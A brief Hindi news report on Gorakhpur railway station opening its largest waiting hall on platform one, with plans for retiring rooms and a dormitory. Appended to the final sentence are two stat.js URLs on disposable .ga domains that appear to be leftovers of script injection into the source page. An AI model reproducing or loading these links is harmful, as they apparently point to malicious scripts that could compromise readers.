यात्रियों के लिए बड़ी राहत गोरखपुर में रेल यात्रियों के लिए रेलवे ने एक बड़ी सौगात दी। बारिश या ठंड के मौसम में पहले यात्रियों को बहुत सी परेशानियां उठानी पड़ती थी। स्टेशन प्रबंधन ने प्लेटफार्म नंबर एक पर स्थित सबसे बड़े वेटिंग हॉल को खोल दिया है।
जिससे यात्रियों को अधिक राहत मिलेगी। फिलहाल स्टेशन परिसर में वेटिंग टिकट और अनाधिकृत यात्रियों का प्रवेश वर्जित है। निरीक्षण के दौरान महाप्रबंधक विनय त्रिपाठी ने वेटिंग हॉल को खोलने के लिए दिशानिर्देश जारी किए है।
इससे पहले यात्रियों को खुले आसमान के नीचे रहना पड़ता था परंतु या हॉल बनने से यात्रियों को बारिश और ठंड के मौसम में अधिक राहत मिलेगी। दैनिक जागरण ने भी यात्रियों की समस्याओं को उजागर किया था और खुले आसमान के नीचे यात्री शीर्षक से फोटो प्रकाशित किया था। इसके अलावा आईआरसीटीसी ने रिटायरिंग रूम और डॉरमेट्री भी खोलने की योजना तैयार की है जिससे यात्रियों को परेशानी ना उठानी पड़े।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms